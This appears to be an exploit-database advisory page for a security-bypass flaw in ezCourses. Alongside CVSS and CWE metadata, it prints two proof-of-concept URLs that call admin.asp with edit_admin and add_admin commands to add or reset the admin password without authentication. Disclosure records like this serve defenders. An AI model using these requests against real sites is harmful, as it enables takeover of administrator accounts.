header-logo
Suggest Exploit
vendor:
ezCourses
by:
Unknown
5.5
CVSS
MEDIUM
Security Bypass
287
CWE
Product Name: ezCourses
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

ezCourses Security Bypass Vulnerability

ezCourses is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input. Attackers could exploit the issue to bypass certain security restrictions and add or change the 'admin' account password.

Mitigation:

Apply patches or updates from the vendor to ensure proper input validation and security restrictions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49907/info

ezCourses is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.

Attackers could exploit the issue to bypass certain security restrictions and add or change the 'admin' account password. 

http://www.example.com//ezCourses/admin/admin.asp?cmd=edit_admin&AdminID=1&Master=Master
http://www.example.com/ezCourses/admin/admin.asp?cmd=add_admin&AdminID=1

Navigation

Suggest Exploit

Services By CQR